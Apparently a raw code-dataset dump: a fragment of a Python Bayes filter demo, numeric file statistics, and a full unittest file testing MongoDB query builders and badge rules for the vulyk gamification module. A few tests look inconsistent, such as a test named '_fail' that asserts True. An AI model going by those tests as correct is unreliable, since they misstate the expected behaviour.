[0, 0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1],
[0.1, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.8]], dtype=np.float32)
cpt_measurement_accuracy = np.array([[0.6, 0.2, 0.1, 0.1, 0, 0, 0, 0, 0, 0],
[0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0, 0],
[0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0],
[0, 0.1, 0.3, 0.3, 0.3, 0, 0, 0, 0, 0],
[0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0],
[0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0],
[0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0],
[0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0],
[0, 0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1],
[0, 0, 0, 0, 0, 0, 0, 0.1, 0.1, 0.8]], dtype=np.float32)
print("From unknown position moving to 1")
belief = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2], dtype=np.float32)
for i in range(10):
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 1, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
print("Moving to state 2")
for i in range(10):
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 2, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
print("Moving to state 3")
for i in range(10):
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 3, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
print("Some dirty measures around 3...")
for i in range(3):
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 2, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 3, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
belief_predicted = my_filter.predict(belief, cpt_motion_model)
belief_updated = my_filter.update(belief_predicted, 4, cpt_measurement_accuracy)
belief = belief_updated
print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))
| 48.973684
| 112
| 0.532509
| 600
| 3,722
| 3.193333
| 0.083333
| 0.153445
| 0.200418
| 0.227557
| 0.864301
| 0.854906
| 0.854906
| 0.840292
| 0.840292
| 0.83977
| 0
| 0.123457
| 0.3036
| 3,722
| 75
| 113
| 49.626667
| 0.615741
| 0
| 0
| 0.684211
| 0
| 0
| 0.084545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035088
| 0
| 0.035088
| 0.175439
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b06e4602928c558ea353feae2a638a9a19b8631
| 36,024
|
py
|
Python
|
tests/gamification/test_query_builders.py
|
mrgambal/ner_trainer
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 33
|
2015-01-20T12:12:40.000Z
|
2020-02-23T14:21:24.000Z
|
tests/gamification/test_query_builders.py
|
mrgambal/vulyk
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 48
|
2015-01-13T16:29:44.000Z
|
2020-10-21T13:09:23.000Z
|
tests/gamification/test_query_builders.py
|
mrgambal/ner_trainer
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 9
|
2015-04-01T15:19:13.000Z
|
2021-06-21T15:44:28.000Z
|
# -*- coding: utf-8 -*-
"""
test_query_builders
"""
import unittest
from datetime import date, datetime, timedelta
from bson import ObjectId
from vulyk.blueprints.gamification.core.queries import (
MongoRuleExecutor,
MongoRuleQueryBuilder)
from vulyk.blueprints.gamification.core.rules import Rule, ProjectRule
from vulyk.blueprints.gamification.models.rules import (
RuleModel, AllRules, ProjectAndFreeRules, StrictProjectRules)
from vulyk.models.stats import WorkSession
from ..base import BaseTest
class TestMongoQueryBuilder(BaseTest):
def test_n_tasks(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_n_tasks_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {
'user': user_id,
'taskType': project,
'answer': {'$exists': True}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_n_tasks_m_days(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=7,
is_weekend=False,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
then = datetime.combine(date.today() - timedelta(days=7),
datetime.min.time())
expected = [
{'$match': {
'user': user_id,
'answer': {'$exists': True},
'end_time': {'$gt': then}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_n_tasks_m_days_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=7,
is_weekend=False,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
then = datetime.combine(date.today() - timedelta(days=7),
datetime.min.time())
expected = [
{'$match': {
'user': user_id,
'answer': {'$exists': True},
'end_time': {'$gt': then},
'taskType': project}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_n_tasks_weekends(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'}}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_n_tasks_weekends_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {'user': user_id, 'taskType': project, 'answer': {'$exists': True}}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'}}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_weekends(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'}}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{'$group': {'_id': {'week': '$week', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_weekends_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=False,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}, 'taskType': project}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'}}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{'$group': {'_id': {'week': '$week', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_weekends_adjacent(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=True,
is_adjacent=True,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
# multiply by week length
then = datetime.combine(date.today() - timedelta(days=5 * 7),
datetime.min.time())
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}, 'end_time': {'$gt': then}}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'},
}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{'$group': {'_id': {'week': '$week', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_weekends_adjacent_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=True,
is_adjacent=True,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
# multiply by week length
then = datetime.combine(date.today() - timedelta(days=5 * 7),
datetime.min.time())
expected = [
{'$match': {
'user': user_id,
'answer': {'$exists': True},
'end_time': {'$gt': then},
'taskType': project}},
{'$project': {
'dayOfWeek': {'$dayOfWeek': '$end_time'},
'year': {'$year': '$end_time'},
'week': {'$week': '$end_time'}}},
{'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
{'$group': {'_id': {'week': '$week', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_days_adjacent(self):
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
# multiply by week length
then = datetime.combine(date.today() - timedelta(days=5),
datetime.min.time())
expected = [
{'$match': {'user': user_id, 'answer': {'$exists': True}, 'end_time': {'$gt': then}}},
{'$project': {
'day': {'$dayOfMonth': '$end_time'},
'month': {'$month': '$end_time'},
'year': {'$year': '$end_time'}}},
{'$group': {
'_id': {'day': '$day', 'month': '$month', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
def test_m_days_adjacent_project(self):
project = 'fake_tasks'
rule = ProjectRule(
task_type_name=project,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True,
rule_id='100')
user_id = ObjectId()
builder = MongoRuleQueryBuilder(rule=rule)
# multiply by week length
then = datetime.combine(date.today() - timedelta(days=5),
datetime.min.time())
expected = [
{'$match': {
'user': user_id,
'answer': {'$exists': True},
'end_time': {'$gt': then},
'taskType': project}},
{'$project': {
'day': {'$dayOfMonth': '$end_time'},
'month': {'$month': '$end_time'},
'year': {'$year': '$end_time'}}},
{'$group': {
'_id': {'day': '$day', 'month': '$month', 'year': '$year'}}},
{"$count": "achieved"}
]
self.assertEqual(expected, builder.build_for(user_id))
class TestMongoQueryExecutor(BaseTest):
NOW = datetime.now()
HOUR = timedelta(hours=1)
DAY = timedelta(days=1)
def tearDown(self):
WorkSession.objects.delete()
super().tearDown()
def test_n_tasks_ok(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100')
WorkSession(user=uid, task=ObjectId(), task_type='fake_task',
answer=ObjectId(),
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), task_type='fake_task_two',
answer=ObjectId(),
start_time=self.NOW - self.DAY, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), task_type='fake_task_three',
answer=ObjectId(),
start_time=self.NOW - self.DAY * 2, end_time=self.NOW) \
.save()
WorkSession(user=ObjectId(), task=ObjectId(), task_type='fake_task',
answer=ObjectId(),
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_fail(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100')
WorkSession(user=uid, task=ObjectId(), task_type='fake_task',
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), task_type='fake_task_two',
start_time=self.NOW - self.DAY, end_time=self.NOW).save()
WorkSession(user=ObjectId(), task=ObjectId(), task_type='fake_task',
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
def test_n_tasks_unclosed_session_fail(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100')
WorkSession(user=uid, task=ObjectId(), task_type='fake_task',
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), task_type='fake_task',
start_time=self.NOW - self.DAY).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
def test_n_tasks_project_ok(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False)
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.DAY, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.DAY * 2, end_time=self.NOW) \
.save()
WorkSession(user=ObjectId(), task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_project_fail(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False)
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.DAY, end_time=self.NOW).save()
WorkSession(user=uid, task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.DAY * 2, end_time=self.NOW) \
.save()
WorkSession(user=ObjectId(), task=ObjectId(), answer=ObjectId(), task_type=task_type_name,
start_time=self.NOW - self.HOUR, end_time=self.NOW).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_m_days_ok(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=21,
days_number=7,
is_weekend=False,
is_adjacent=False,
rule_id='100')
for i in range(1, 22):
day_i = self.NOW - self.DAY * (i % 7)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_m_days_project_ok(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False)
for i in range(1, 22):
day_i = self.NOW - self.DAY * (i % 7)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type=task_type_name,
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_m_days_more_days(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=21,
days_number=7,
is_weekend=False,
is_adjacent=False,
rule_id='100')
for i in range(1, 22):
# tasks are spread across 9 days, which is more
day_i = self.NOW - self.DAY * (i % 9)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
def test_n_tasks_m_days_less_tasks(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=21,
days_number=7,
is_weekend=False,
is_adjacent=False,
rule_id='100')
# less tasks
for i in range(1, 21):
day_i = self.NOW - self.DAY * (i % 3)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
def test_n_tasks_weekends_sun(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='100')
to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
for i in range(1, 22):
day_i = (self.NOW - to_sun) - self.DAY * 7
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_weekends_sat(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='100')
to_sat = timedelta(days=(self.NOW.weekday() + 1) % 6)
for i in range(1, 22):
day_i = (self.NOW - to_sat) - self.DAY * 7
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_n_tasks_weekends_mon_fail(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=20,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='100')
to_mon = timedelta(days=self.NOW.weekday())
for i in range(1, 22):
day_i = (self.NOW - to_mon) - self.DAY * 7
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % (i % 3),
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
def test_m_weekends(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=False,
rule_id='100')
to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
for i in range(1, 8):
# every second Sunday
day_i = (self.NOW - to_sun) - (self.DAY * 7 * i * 2)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task',
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_weekends_project(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=False)
to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
for i in range(1, 8):
# every second Sunday
day_i = (self.NOW - to_sun) - (self.DAY * 7 * i * 2)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type=task_type_name,
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_adjacent_weekends(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=True,
rule_id='100')
to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
for i in range(0, 8):
# every second Sunday
day_i = (self.NOW - to_sun) - (self.DAY * 7 * i)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task',
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_adjacent_weekends_project(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=7,
is_weekend=True,
is_adjacent=True)
to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
for i in range(0, 8):
# every second Sunday
day_i = (self.NOW - to_sun) - (self.DAY * 7 * i)
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type=task_type_name,
start_time=day_i,
end_time=day_i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_days_adjacent_ok(self):
uid = ObjectId()
rule = Rule(
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True,
rule_id='100')
for i in range(1, 6):
WorkSession(user=uid,
task=ObjectId(),
task_type='fake_task',
answer=ObjectId(),
start_time=self.NOW - self.DAY * i,
end_time=self.NOW - self.DAY * i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_days_adjacent_project_ok(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True)
for i in range(1, 6):
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type=task_type_name,
start_time=self.NOW - self.DAY * i,
end_time=self.NOW - self.DAY * i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertTrue(result)
def test_m_days_adjacent_project_fail(self):
uid = ObjectId()
task_type_name = 'fake_task'
rule = ProjectRule(
rule_id='100',
task_type_name=task_type_name,
badge='',
name='',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True)
for i in range(1, 6):
WorkSession(user=uid,
task=ObjectId(),
answer=ObjectId(),
task_type='fake_task_%s' % i,
start_time=self.NOW - self.DAY * i,
end_time=self.NOW - self.DAY * i).save()
result = MongoRuleExecutor.achieved(
user_id=uid, rule=rule, collection=WorkSession.objects)
self.assertFalse(result)
class TestRuleModel(BaseTest):
RULES = [
Rule(
badge='',
name='rule_1',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100'),
Rule(
badge='',
name='rule_2',
description='',
bonus=10,
tasks_number=30,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='200'),
ProjectRule(
rule_id='300',
task_type_name='project_1',
badge='',
name='rule_3',
description='',
bonus=0,
tasks_number=40,
days_number=0,
is_weekend=False,
is_adjacent=False),
ProjectRule(
rule_id='400',
task_type_name='project_2',
badge='',
name='rule_4',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True),
]
def setUp(self):
super().setUp()
for rule in self.RULES:
RuleModel.from_rule(rule).save()
def tearDown(self):
RuleModel.objects.delete()
super().tearDown()
def test_everything_ok(self):
self.assertEqual(
len(self.RULES),
len(list(RuleModel.get_actual_rules([], AllRules(), False)))
)
def test_everything_project_1(self):
rules = list(RuleModel.get_actual_rules(
[], ProjectAndFreeRules('project_1'), False))
self.assertEqual(3, len(rules))
self.assertTrue(any(r.id == '300' for r in rules))
self.assertTrue(all(r.id != '400' for r in rules))
def test_everything_project_2(self):
rules = list(RuleModel.get_actual_rules(
[], ProjectAndFreeRules('project_2'), False))
self.assertEqual(3, len(rules))
self.assertTrue(any(r.id == '400' for r in rules))
self.assertTrue(all(r.id != '300' for r in rules))
def test_everything_and_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
rules = list(RuleModel.get_actual_rules([], AllRules(), True))
rules_no_weekend = list(
RuleModel.get_actual_rules([], AllRules(), False))
self.assertEqual(5, len(rules))
self.assertTrue(any(r.id == '500' for r in rules))
self.assertEqual(4, len(rules_no_weekend))
self.assertTrue(all(r.id != '500' for r in rules_no_weekend))
def test_exclude_ids(self):
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(ids, AllRules(), False))
self.assertEqual(2, len(rules))
self.assertTrue(all(r.id not in ids for r in rules))
def test_exclude_ids_project(self):
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(
ids, ProjectAndFreeRules('project_1'), False))
self.assertEqual(1, len(rules))
self.assertTrue(rules[0].id, '300')
def test_exclude_ids_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(ids, AllRules(), True))
self.assertEqual(3, len(rules))
self.assertTrue(any(r.id == '500' for r in rules))
def test_exclude_ids_project_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
RuleModel.from_rule(
ProjectRule(
task_type_name='project_3',
badge='',
name='rule_6',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='600')).save()
ids = ['100', '500']
rules = list(RuleModel.get_actual_rules(
ids, ProjectAndFreeRules('project_3'), True))
self.assertEqual(2, len(rules))
self.assertTrue(all(r.id in ['200', '600'] for r in rules))
self.assertTrue(all(r.id != '500' for r in rules))
def test_exclude_ids_strict_project_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
RuleModel.from_rule(
ProjectRule(
task_type_name='project_3',
badge='',
name='rule_6',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='600')).save()
ids = ['100', '500']
rules = list(RuleModel.get_actual_rules(
ids, StrictProjectRules('project_3'), True))
self.assertEqual(1, len(rules))
self.assertTrue(rules[0].id, '600')
if __name__ == '__main__':
unittest.main()
| 32.689655
| 98
| 0.490701
| 3,609
| 36,024
| 4.680244
| 0.045719
| 0.035048
| 0.030549
| 0.052099
| 0.930259
| 0.920845
| 0.911847
| 0.900539
| 0.898881
| 0.879522
| 0
| 0.020278
| 0.381246
| 36,024
| 1,101
| 99
| 32.719346
| 0.737506
| 0.007634
| 0
| 0.859833
| 0
| 0
| 0.059808
| 0
| 0
| 0
| 0
| 0
| 0.055439
| 1
| 0.044979
| false
| 0
| 0.008368
| 0
| 0.060669
| 0.003138
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b2a38e30f0380e37dbe5bbbbb468a995fd6bc7b
| 19,551
|
py
|
Python
|
modules/nltk_contrib/refexpr/gre3d_facts.py
|
h4ck3rm1k3/NLP-project
|
aeba6302f60d27a8b9e65ad28d2d74e1276c7cd6
|
[
"MIT"
] | 123
|
2015-01-06T10:46:18.000Z
|
